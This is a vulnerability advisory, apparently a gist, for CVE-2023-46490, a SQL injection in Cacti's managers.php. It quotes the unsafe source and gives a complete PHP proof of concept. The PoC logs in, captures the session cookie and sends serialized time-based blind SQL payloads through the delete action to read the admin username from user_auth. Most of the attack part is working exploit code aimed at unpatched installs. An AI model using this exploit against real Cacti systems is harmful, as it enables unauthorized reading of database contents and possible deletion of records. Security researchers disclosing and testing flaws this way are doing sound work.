CVE-2023-46490

gistfile1.txt

Package
cacti
Affected versions
<=1.2.25
Patched versions
None

Summary
A SQL Injection vulnerability discovered in managers.php allowed authenticated users to access database information.

Details
SQL Injection vulnerability discovered in managers.php. In function form_actions(), request_var 'selected_items' is joined into into SQL statements without security checks.
source code:

function form_actions() {
	global $manager_actions, $manager_notification_actions;

	if (isset_request_var('selected_items')) {
		if (isset_request_var('action_receivers')) {
			$selected_items = cacti_unserialize(stripslashes(get_nfilter_request_var('selected_graphs_array')));

			if ($selected_items != false) {
				if (get_nfilter_request_var('drp_action') == '1') { // delete

					db_execute('DELETE FROM snmpagent_managers WHERE id IN (' . implode(',' ,$selected_items) . ')');
					db_execute('DELETE FROM snmpagent_managers_notifications WHERE manager_id IN (' . implode(',' ,$selected_items) . ')');
					db_execute('DELETE FROM snmpagent_notifications_log WHERE manager_id IN (' . implode(',' ,$selected_items) . ')');
				} elseif (get_nfilter_request_var('drp_action') == '2') { // enable
					db_execute("UPDATE snmpagent_managers SET disabled = '' WHERE id IN (" . implode(',' ,$selected_items) . ')');
				} elseif (get_nfilter_request_var('drp_action') == '3') { // disable
					db_execute("UPDATE snmpagent_managers SET disabled = 'on' WHERE id IN (" . implode(',' ,$selected_items) . ')');
				}

				header('Location: managers.php?header=false');
				exit;
			}
PoC
$url = ["http://localhost/cacti/", "http://192.168.80.128/cacti/",];
$url = $url[1];

$username = 'admin';
$password = 'password';
$login = "index.php?action=login&login_username=$username&login_password=$password";

$injectSQLcode1=serialize(["1 ) or  if ('admin' = (SELECT username FROM user_auth WHERE id = 1 ), sleep(5), 0"]);
$injectSQLcode2=serialize(["1 ) or  if ('error' = (SELECT username FROM user_auth WHERE id = 1 ), sleep(5), 0"]);

$target = "managers.php?action=actions&selected_items=1&action_receivers=1&drp_action=1&selected_graphs_array=";


function curlPage($url, $cookie=false){
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_HEADER, 1);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

    curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 60);
    curl_setopt($curl, CURLOPT_TIMEOUT, 60);

    if($cookie){
        curl_setopt($curl, CURLOPT_COOKIE,$cookie);
    }

    $data = curl_exec($curl);

    echo "[++Debug++] ".$url."\n";
    curl_close($curl);

    return $data;
}

function getSQLinjectionPage(){
    global $url, $login, $target, $injectSQLcode1, $injectSQLcode2;

    //login
    $data1 = curlPage($url.$login);
    //echo $data1."\n";

    //get cookie
    $cookie = substr($data1, strpos($data1, 'Set-Cookie: ') + 12, 32);
    echo '[++Debug++] Cacti Cookie: '.$cookie."\n";

    //check login
    $data2 = curlPage($url."index.php", $cookie);
    //echo substr($data2, 0, 300)."\n\n";

    //time of correct test
    $time1 = time();
    $data3 = curlPage($url.$target.urlencode($injectSQLcode1), $cookie);
    $time1 = time() - $time1;
    echo "[++result++] time of correct test: ".$time1."\n\n";

    //time of error test
    $time2 = time();
    $data3 = curlPage($url.$target.urlencode($injectSQLcode2), $cookie);
    $time2 = time() - $time2;
    echo "[++result++] time of error test: ".$time2."\n\n";

    if( $time2 <=1 and $time1 >= 5){
        echo "[++result++] Time difference exist, vulnerability exsit!"."\n\n";
    }else{
        echo "[++result++] No time difference, vulnerability not exsit"."\n\n";
    }
}

//set ip, port, username, password, InjectCode first
getSQLinjectionPage();

Impact
Although there is no echo，by measuring the time delay of accessing the website, authenticated users can obtain mysql database content.